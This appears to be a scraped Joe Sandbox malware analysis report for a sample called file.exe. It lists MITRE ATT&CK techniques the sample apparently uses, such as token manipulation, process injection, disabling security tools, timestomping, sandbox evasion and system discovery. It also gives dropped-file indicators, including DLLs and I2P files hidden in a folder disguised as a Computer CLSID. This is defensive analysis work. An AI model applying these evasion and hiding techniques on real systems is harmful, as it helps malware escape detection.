Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_381d6b4d-05a1-4382-babe-90fa558ea39b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF885.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9CE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9EE.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9FC.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA3B.tmp.txt

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\n53qvwtup4waekyrakvw2svm247ujbkgfwsr6blnwpantzo5nz2a.dat

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\wz7qkrnzqpr2zyylfckxtaxrsqsblspad7pbqa3ee5qc7klzdqfq.dat

Windows Analysis Report
file.exe

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Command: Command Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre